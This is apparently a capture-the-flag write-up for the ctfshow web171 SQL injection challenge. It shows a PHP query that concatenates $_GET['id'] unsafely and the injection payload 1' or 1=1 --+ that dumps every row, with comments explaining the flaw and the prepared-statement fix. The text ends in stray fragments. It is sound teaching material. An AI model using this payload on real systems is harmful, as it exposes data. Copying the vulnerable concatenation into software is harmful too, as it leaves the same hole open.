
ctfshow-web入门-sql注入-web171

查询语句

// Build the SQL statement by string concatenation to look up the user with the given ID.
// NOTE(review): $_GET['id'] is placed between the single quotes without escaping or
// binding, so a quote character in the request parameter ends the string literal and
// the rest of the value is parsed as SQL. The username != 'flag' filter and the
// limit 1 live in the same string and give no protection once that happens.
// The fix is a prepared statement with id passed as a bound parameter (PDO or mysqli);
// an integer check on id would help as well if ids are numeric (TODO confirm column type).
$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";

提交 id 为 1' or 1=1 --+ 时,输出了所有的数据(or 1=1 使 where 条件对每一行都成立,--+ 注释掉了后面的 ' limit 1;)。
此时sql语句为

// The statement that results from the input shown above. `and` binds tighter than `or`,
// so the condition reads (username != 'flag' and id = '1') or 1=1 and holds for every
// row, including the one the username filter was meant to hide.
// The `+` reaches PHP as a space after URL decoding, so `-- ` opens a comment (assuming
// MySQL-style comment syntax) and the trailing `' limit 1;` is never executed.
// With a bound parameter the whole input would be compared to id as one string value.
$sql = "select username,password from user where username !='flag' and id = '1' or 1=1 --+' limit 1;";


sel

;